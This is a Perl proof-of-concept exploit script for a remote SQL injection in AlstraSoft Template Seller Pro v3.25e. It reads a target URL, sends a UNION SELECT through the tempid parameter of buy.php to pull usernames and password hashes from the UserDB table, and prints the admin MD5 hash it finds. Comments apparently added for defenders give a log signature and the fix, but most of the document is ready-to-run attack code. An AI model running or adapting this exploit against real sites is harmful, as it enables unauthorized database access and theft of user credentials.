#!/usr/bin/perl -w
# # # # #
# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/template.htm
# Demo: http://blizsoft.com/templates/
# Version: 3.25e
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Wipe the terminal before the banner is printed. The command is chosen from
# the platform name in $^O: 'cls' on MSWin32, 'clear' everywhere else.
sub clear {
    my $wipe_cmd = 'clear';
    $wipe_cmd = 'cls' if $^O eq 'MSWin32';
    return system($wipe_cmd);
}
# Proof-of-concept flow, annotated for defenders: print a banner, read a base
# URL from STDIN, send a single GET request to buy.php with a UNION SELECT
# placed in the tempid parameter, then look for 32 hex characters in the reply.
clear();
print "|----------------------------------------------------|\n";
print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
print "| Author: Ihsan Sencan |\n";
print "| Author Web: http://ihsan.net |\n";
print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
print "| |\n";
print "| |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
# The base URL is taken from STDIN as typed; only the trailing newline is
# removed before it is used to build the request URL.
print "\nInsert Target:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
# Expression and table name placed into the injected SELECT: user_name and
# user_password joined by char(58) (a colon) and aggregated with group_concat,
# read from the UserDB table.
$elicha="group_concat(user_name,char(58),user_password)";
$table="UserDB";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Hard-coded User-Agent sent with the request.
# NOTE(review): a constant value like this can be searched for in access logs,
# but it is only a weak indicator because any client can send it.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
# Request signature for log review and WAF rules: a GET to buy.php whose
# tempid value is -1 followed by "union+select", an eight-column list with the
# expression above in the fourth position, "from/**/UserDB", and a trailing
# "+--+" SQL comment.
# NOTE(review): presumably buy.php concatenates tempid into its SQL text
# without binding or integer validation -- confirm against the application
# source. The fix belongs there: bind tempid as a query parameter or cast it
# to an integer before it reaches the query.
$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
# The first run of 32 hex characters in the response body is reported as the
# "Admin Hash". 32 hex characters is the length of an MD5 digest.
# NOTE(review): presumably the application stores unsalted MD5 password
# hashes; if so, treat every stored credential as exposed once this request
# appears in logs, and move storage to a salted, slow password hash.
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}